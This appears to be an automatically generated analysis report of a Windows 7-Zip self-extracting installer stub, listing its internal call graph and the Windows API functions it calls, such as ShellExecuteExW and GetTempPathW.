9390->9392 9394 40254d 2 API calls 9391->9394 9395 40603f 9392->9395 9396 406051 9393->9396 9397 406092 9394->9397 9398 40254d 2 API calls 9395->9398 9399 40243b lstrcmpW 9396->9399 9400 401411 2 API calls 9397->9400 9401 406048 9398->9401 9402 406068 9399->9402 9403 40609a 9400->9403 9404 40254d 2 API calls 9401->9404 9402->9397 9406 40254d 2 API calls 9402->9406 9405 401411 2 API calls 9403->9405 9404->9396 9407 4060a2 memset 9405->9407 9406->9391 9408 4060e1 9407->9408 9409 404594 2 API calls 9408->9409 9410 4060fe 9409->9410 9411 401329 2 API calls 9410->9411 9412 406109 9411->9412 9413 403b7f 19 API calls 9412->9413 9414 406112 9413->9414 9415 4061b1 9414->9415 9619 4021ed 9414->9619 9417 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9415->9417 9419 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9415->9419 9417->9348 9419->9344 9420 406150 9422 403b7f 19 API calls 9420->9422 9421 401429 2 API calls 9423 406147 9421->9423 9424 406168 ShellExecuteExW 9422->9424 9425 40254d 2 API calls 9423->9425 9427 406282 9424->9427 9428 40618c 9424->9428 9425->9420 9431 407776 55 API calls 9427->9431 9429 4061a0 CloseHandle 9428->9429 9430 406192 WaitForSingleObject 9428->9430 9840 402185 9429->9840 9430->9429 9433 40628c 9431->9433 9434 403e0d 16 API calls 9433->9434 9435 406291 9 API calls 9434->9435 9436 4062e1 9435->9436 9436->9417 9438 401b6c SetTimer GetMessageW DispatchMessageW KillTimer DestroyWindow 9437->9438 9439 401b9f GetVersionExW 9437->9439 9438->9439 9439->9135 9439->9136 9441 40112b 2 API calls 9440->9441 9442 403e38 GetCommandLineW 9441->9442 9443 404594 9442->9443 9444 4045ce 9443->9444 9446 4045a2 9443->9446 9445 4045c6 9444->9445 9448 401429 2 API calls 9444->9448 9445->9147 9446->9445 9447 401429 2 API calls 9446->9447 9447->9446 9448->9444 9450 401411 2 API calls 9449->9450 9458 402a79 9450->9458 9451 401362 2 API calls 9452 402b6c ??3@YAXPAX 9451->9452 9452->9150 9453 402b5f 9453->9451 9455 401411 2 API calls 9455->9458 9456 401429 ??2@YAPAXI 
??3@YAXPAX 9456->9458 9458->9453 9458->9455 9458->9456 9459 401362 2 API calls 9458->9459 9897 4025c6 9458->9897 9900 40272e 9458->9900 9460 402ad9 ??3@YAXPAX 9459->9460 9461 4013e2 2 API calls 9460->9461 9462 402aee ??3@YAXPAX ??3@YAXPAX 9461->9462 9462->9458 9464 403d80 9463->9464 9465 403dbd 9464->9465 9466 403d9a lstrlenW lstrlenW 9464->9466 9465->9154 9465->9156 9911 401a85 9466->9911 9469 401f47 3 API calls 9468->9469 9470 404416 9469->9470 9471 401f9d 19 API calls 9470->9471 9472 40441d 9471->9472 9473 401f9d 19 API calls 9472->9473 9474 404429 9473->9474 9475 401f9d 19 API calls 9474->9475 9476 404435 9475->9476 9477 401f9d 19 API calls 9476->9477 9478 404441 9477->9478 9479 401f9d 19 API calls 9478->9479 9480 40444d 9479->9480 9481 401f9d 19 API calls 9480->9481 9482 404459 9481->9482 9483 401f9d 19 API calls 9482->9483 9484 404465 9483->9484 9485 404480 SHGetSpecialFolderPathW 9484->9485 9488 404533 #17 9484->9488 9489 401411 2 API calls 9484->9489 9490 401329 ??2@YAPAXI ??3@YAXPAX 9484->9490 9492 402f6c 7 API calls 9484->9492 9916 402425 ??3@YAXPAX ??3@YAXPAX 9484->9916 9485->9484 9486 40449a wsprintfW 9485->9486 9487 401411 2 API calls 9486->9487 9487->9484 9488->9155 9489->9484 9490->9484 9492->9484 9494 4022b0 2 API calls 9493->9494 9495 4025c2 9494->9495 9495->9199 9917 403e86 9496->9917 9498 404e56 9499 403e86 2 API calls 9498->9499 9500 404e65 9499->9500 9921 404343 9500->9921 9504 404e82 ??3@YAXPAX 9505 404343 3 API calls 9504->9505 9506 404e9d 9505->9506 9507 403ec1 2 API calls 9506->9507 9508 404ea8 ??3@YAXPAX wsprintfA 9507->9508 9937 403ef6 9508->9937 9510 404ed0 9511 403ef6 2 API calls 9510->9511 9512 404edb 9511->9512 9513 402844 9512->9513 9514 402851 9513->9514 9522 40dcfb 3 API calls 9514->9522 9515 402863 lstrlenA lstrlenA 9520 402890 9515->9520 9516 40296e 9516->9211 9516->9213 9517 40293b memmove 9517->9516 9517->9520 9518 4028db memcmp 9518->9516 9518->9520 9519 402918 memcmp 9519->9520 9520->9516 9520->9517 9520->9518 9520->9519 9523 
40dcc7 GetLastError 9520->9523 9948 402640 9520->9948 9522->9515 9523->9520 9525 40243b lstrcmpW 9524->9525 9526 40461c 9525->9526 9527 40466c 9526->9527 9529 401329 2 API calls 9526->9529 9528 40243b lstrcmpW 9527->9528 9530 40468a 9528->9530 9531 404633 9529->9531 9533 40243b lstrcmpW 9530->9533 9532 401f9d 19 API calls 9531->9532 9534 40463a 9532->9534 9536 4046a2 9533->9536 9535 40254d 2 API calls 9534->9535 9537 404643 9535->9537 9538 40243b lstrcmpW 9536->9538 9539 401329 2 API calls 9537->9539 9540 4046ba 9538->9540 9541 40465c 9539->9541 9543 40243b lstrcmpW 9540->9543 9542 401f9d 19 API calls 9541->9542 9544 404663 9542->9544 9545 4046d2 9543->9545 9546 40254d 2 API calls 9544->9546 9547 4046e9 9545->9547 9548 4046d9 lstrcmpiW 9545->9548 9546->9527 9549 40243b lstrcmpW 9547->9549 9548->9547 9550 4046ff 9549->9550 9551 40243b lstrcmpW 9550->9551 9552 40472c 9551->9552 9555 404739 9552->9555 9951 403d1f 9552->9951 9554 40243b lstrcmpW 9559 40474d 9554->9559 9555->9554 9556 40476d 9558 40243b lstrcmpW 9556->9558 9564 404780 9558->9564 9559->9556 9560 40243b lstrcmpW 9559->9560 9955 403cc6 9559->9955 9560->9559 9561 4047a0 9563 40243b lstrcmpW 9561->9563 9565 4047ac 9563->9565 9564->9561 9566 40243b lstrcmpW 9564->9566 9959 403cf7 9564->9959 9567 40243b lstrcmpW 9565->9567 9566->9564 9568 4047bd 9567->9568 9569 40243b lstrcmpW 9568->9569 9570 4047ce 9569->9570 9571 4047e4 9570->9571 9572 4047db _wtol 9570->9572 9573 40243b lstrcmpW 9571->9573 9572->9571 9574 4047f0 9573->9574 9575 404800 9574->9575 9576 4047f7 _wtol 9574->9576 9577 40243b lstrcmpW 9575->9577 9576->9575 9578 40480c 9577->9578 9579 40243b lstrcmpW 9578->9579 9580 404824 9579->9580 9581 40243b lstrcmpW 9580->9581 9582 40483c 9581->9582 9582->9270 9967 4023dd 9583->9967 9587 404045 9586->9587 9588 404088 9586->9588 9589 4012f7 2 API calls 9587->9589 9590 403b7f 19 API calls 9587->9590 9588->9250 9588->9251 9589->9587 9591 404062 SetEnvironmentVariableW ??3@YAXPAX 9590->9591 9591->9587 9591->9588 
9593 40393b 7 API calls 9592->9593 9594 403b69 9593->9594 9595 4039f6 7 API calls 9594->9595 9596 403b74 9595->9596 9597 4027c7 6 API calls 9596->9597 9598 403b7a 9597->9598 9598->9271 9744 4083b6 9598->9744 9971 408676 9599->9971 9601 404a55 ??2@YAPAXI 9602 404a64 9601->9602 9616 40dcfb 3 API calls 9602->9616 9603 404a85 9973 40a7de _EH_prolog 9603->9973 9989 40b2fc 9603->9989 9604 404a95 9605 404ab3 9604->9605 9606 404a99 9604->9606 9608 404ada ??2@YAPAXI 9605->9608 9612 403354 86 API calls 9605->9612 9607 407776 55 API calls 9606->9607 9611 404aa1 9607->9611 9609 404ae6 9608->9609 9610 404aed 9608->9610 10014 404292 9609->10014 9995 40150b 9610->9995 9611->9317 9614 404ac6 9612->9614 9614->9608 9614->9611 9616->9603 9620 402200 LoadLibraryA GetProcAddress 9619->9620 9621 4021fb 9619->9621 9622 40221b 9620->9622 9623 402223 9620->9623 9621->9415 9621->9420 9621->9421 9622->9621 9623->9622 10477 4021b9 LoadLibraryA GetProcAddress 9623->10477 9626 40661a 2 API calls 9625->9626 9627 4049af 9626->9627 9628 401f9d 19 API calls 9627->9628 9629 4049bd 9628->9629 9630 4024fc 2 API calls 9629->9630 9631 4049c7 9630->9631 9632 4049fd 9631->9632 9634 40254d ??2@YAPAXI ??3@YAXPAX 9631->9634 9633 40254d 2 API calls 9632->9633 9635 404a0a 9633->9635 9634->9631 9636 401f9d 19 API calls 9635->9636 9637 404a11 9636->9637 9638 40254d 2 API calls 9637->9638 9639 404a1b 9638->9639 9640 4073d1 21 API calls 9639->9640 9641 404a30 ??3@YAXPAX 9640->9641 9642 404a41 ctype 9641->9642 9642->9175 9644 40e8da ctype 3 API calls 9643->9644 9645 403e7e 9644->9645 9646 40e8da ctype 3 API calls 9645->9646 9647 40e943 ??3@YAXPAX 9646->9647 9647->9169 9649 40db53 2 API calls 9648->9649 9650 404ce8 9649->9650 9651 404d44 9650->9651 9653 4024fc 2 API calls 9650->9653 9652 4025ae 2 API calls 9651->9652 9654 404d4c 9652->9654 9655 404cf7 9653->9655 9656 403e86 2 API calls 9654->9656 9659 404db5 ??3@YAXPAX 9655->9659 9661 403354 86 API calls 9655->9661 9657 404d59 9656->9657 9658 403ef6 2 API calls 
9657->9658 9660 404d66 9658->9660 9673 404db1 9659->9673 9662 403ef6 2 API calls 9660->9662 9663 404d1b 9661->9663 9664 404d73 9662->9664 9663->9659 9666 40db53 2 API calls 9663->9666 9665 403ef6 2 API calls 9664->9665 9667 404d80 9665->9667 9668 404d37 9666->9668 9669 40dd5f 2 API calls 9667->9669 9668->9659 9670 404d3b ??3@YAXPAX 9668->9670 9671 404d94 9669->9671 9670->9651 9671->9659 9672 404d9d ??3@YAXPAX 9671->9672 9672->9673 9673->9234 9675 4025ae 2 API calls 9674->9675 9691 4030a8 9675->9691 9676 403301 9677 403344 ??3@YAXPAX 9676->9677 9678 40334e 9677->9678 9678->9220 9678->9226 9679 401411 ??2@YAPAXI ??3@YAXPAX 9679->9691 9681 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9681->9691 9682 401362 2 API calls 9683 4030f3 ??3@YAXPAX ??3@YAXPAX 9682->9683 9684 403303 9683->9684 9683->9691 10485 4029c3 9684->10485 9688 40331c ??3@YAXPAX 9688->9678 9689 4031e5 strncmp 9690 4031d0 strncmp 9689->9690 9689->9691 9690->9689 9690->9691 9691->9676 9691->9679 9691->9681 9691->9682 9691->9684 9691->9689 9692 401362 2 API calls 9691->9692 9693 402640 2 API calls 9691->9693 9696 402640 ??2@YAPAXI ??3@YAXPAX 9691->9696 9698 4023dd lstrcmpW 9691->9698 9699 402f6c 7 API calls 9691->9699 9701 403330 9691->9701 9702 4032b2 lstrcmpW 9691->9702 9706 401329 2 API calls 9691->9706 10479 402986 9691->10479 10484 402425 ??3@YAXPAX ??3@YAXPAX 9691->10484 9694 403252 ??3@YAXPAX 9692->9694 9693->9690 9695 402a69 9 API calls 9694->9695 9697 403263 lstrcmpW 9695->9697 9696->9691 9697->9691 9698->9691 9699->9691 9704 402f6c 7 API calls 9701->9704 9702->9691 9703 4032c0 lstrcmpW 9702->9703 9703->9691 9705 40333c 9704->9705 10503 402425 ??3@YAXPAX ??3@YAXPAX 9705->10503 9706->9691 9709 402f86 9708->9709 9710 402f7b 9708->9710 9712 408761 4 API calls 9709->9712 10505 402668 9710->10505 9713 402f92 9712->9713 9713->9224 9714->9224 9716 4024fc 2 API calls 9715->9716 9717 40485f 9716->9717 9718 40254d 2 API calls 9717->9718 9719 40486c 9718->9719 9720 404888 9719->9720 9721 401429 2 API 
calls 9719->9721 9722 40254d 2 API calls 9720->9722 9721->9719 9723 404892 9722->9723 9724 40408b 94 API calls 9723->9724 9725 40489d ??3@YAXPAX 9724->9725 9725->9270 9727 4040a2 lstrlenW 9726->9727 9728 4040ce 9726->9728 9729 401a85 4 API calls 9727->9729 9728->9270 9730 4040b8 9729->9730 9730->9727 9730->9728 9731 4040d5 9730->9731 9732 4024fc 2 API calls 9731->9732 9735 4040de 9732->9735 10510 402776 9735->10510 9736 403093 84 API calls 9737 40414c 9736->9737 9738 404156 ??3@YAXPAX ??3@YAXPAX 9737->9738 9739 40416d ??3@YAXPAX ??3@YAXPAX 9737->9739 9738->9728 9739->9728 9740->9281 9742 40661a 2 API calls 9741->9742 9743 403b48 9742->9743 9743->9268 9745 408646 9744->9745 9757 4083d5 ctype 9744->9757 9745->9277 9746 40661a 2 API calls 9746->9757 9747 40243b lstrcmpW 9747->9757 9748 40786b 23 API calls 9748->9757 9750 407674 23 API calls 9750->9757 9751 407613 23 API calls 9751->9757 9752 403b40 2 API calls 9752->9757 9753 401f9d 19 API calls 9753->9757 9754 403f48 4 API calls 9754->9757 9755 4073d1 21 API calls 9755->9757 9756 407776 55 API calls 9756->9757 9757->9745 9757->9746 9757->9747 9757->9748 9757->9750 9757->9751 9757->9752 9757->9753 9757->9754 9757->9755 9757->9756 9758 407717 25 API calls 9757->9758 9759 4073d1 21 API calls 9757->9759 10520 40744b 9757->10520 9758->9757 9760 408476 ??3@YAXPAX 9759->9760 9760->9757 9762 40243b lstrcmpW 9761->9762 9763 4082fd 9762->9763 9764 40830b 9763->9764 10524 4019f0 GetStdHandle WriteFile 9763->10524 9766 40831e 9764->9766 10525 4019f0 GetStdHandle WriteFile 9764->10525 9768 408333 9766->9768 10526 4019f0 GetStdHandle WriteFile 9766->10526 9772 408344 9768->9772 10527 4019f0 GetStdHandle WriteFile 9768->10527 9770 40243b lstrcmpW 9774 408351 9770->9774 9772->9770 9773 40835f 9776 40243b lstrcmpW 9773->9776 9774->9773 10528 4019f0 GetStdHandle WriteFile 9774->10528 9777 40836c 9776->9777 9778 40837a 9777->9778 10529 4019f0 GetStdHandle WriteFile 9777->10529 9780 40243b lstrcmpW 9778->9780 9781 408387 9780->9781 9782 
408395 9781->9782 10530 4019f0 GetStdHandle WriteFile 9781->10530 9784 40243b lstrcmpW 9782->9784 9785 4083a2 9784->9785 9786 4083b2 9785->9786 10531 4019f0 GetStdHandle WriteFile 9785->10531 9786->9271 9789 407636 9788->9789 9790 407658 9789->9790 9791 40764b 9789->9791 10535 407186 9790->10535 10532 407154 9791->10532 9794 407653 9795 4073d1 21 API calls 9794->9795 9796 407671 9795->9796 9796->9313 9798 407689 9797->9798 9799 40716d 2 API calls 9798->9799 9800 407694 9799->9800 9801 4073d1 21 API calls 9800->9801 9802 4076a5 9801->9802 9802->9313 9804 401411 2 API calls 9803->9804 9805 403f96 9804->9805 9806 402535 2 API calls 9805->9806 9807 403f9f GetTempPathW 9806->9807 9808 403fb8 9807->9808 9813 403fcf 9807->9813 9809 402535 2 API calls 9808->9809 9810 403fc3 GetTempPathW 9809->9810 9810->9813 9811 402535 2 API calls 9812 403ff2 wsprintfW 9811->9812 9812->9813 9813->9811 9814 404009 GetFileAttributesW 9813->9814 9815 40402d 9813->9815 9814->9813 9814->9815 9815->9298 9817 40787e 9816->9817 10541 40719f 9817->10541 9820 4073d1 21 API calls 9821 4078b3 9820->9821 9821->9317 9823 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9822->9823 9824 403e16 9822->9824 9823->9318 9825 402c86 16 API calls 9824->9825 9825->9823 9827 40243b lstrcmpW 9826->9827 9828 40455d 9827->9828 9829 404592 9828->9829 9830 401329 2 API calls 9828->9830 9829->9369 9831 40456c 9830->9831 9832 403b7f 19 API calls 9831->9832 9833 404572 9832->9833 9833->9829 9834 401429 2 API calls 9833->9834 9834->9829 9836 4012f7 2 API calls 9835->9836 9837 4043d4 9836->9837 9838 40254d 2 API calls 9837->9838 9839 4043df 9838->9839 9839->9358 9841 4021a9 9840->9841 9842 40218e LoadLibraryA GetProcAddress 9840->9842 9841->9415 9842->9841 9844 401411 2 API calls 9843->9844 9851 4048bc 9844->9851 9845 401329 2 API calls 9845->9851 9846 40494e 9847 404988 ??3@YAXPAX 9846->9847 9849 4048ab 3 API calls 9846->9849 9847->9368 9848 401429 2 API calls 9848->9851 9850 404985 9849->9850 9850->9847 9851->9845 
APIs
  • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
  • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
  • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
  • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
  • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
  • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
  • Part of subcall function 00401B37: DestroyWindow.USER32(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
• GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
• GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
• _wtol.MSVCRT ref: 0040509F
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
• GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
• _wtol.MSVCRT ref: 00405217
• ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
  • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
  • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
• ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
  • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
  • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
• wsprintfW.USER32 ref: 00405595
• _wtol.MSVCRT ref: 004057DE
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
• ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
• ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
• ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
• CoInitialize.OLE32(00000000), ref: 004059E9
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
• GetKeyState.USER32(00000010), ref: 00405AA1
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
• ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
• memset.MSVCRT ref: 004060AE
• ShellExecuteExW.SHELL32(?), ref: 0040617E
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
• CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
• ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
• ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
• ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
• ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
• ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
• ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
• ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
• ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
• GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
• ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
• _wtol.MSVCRT ref: 00405F65
• ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
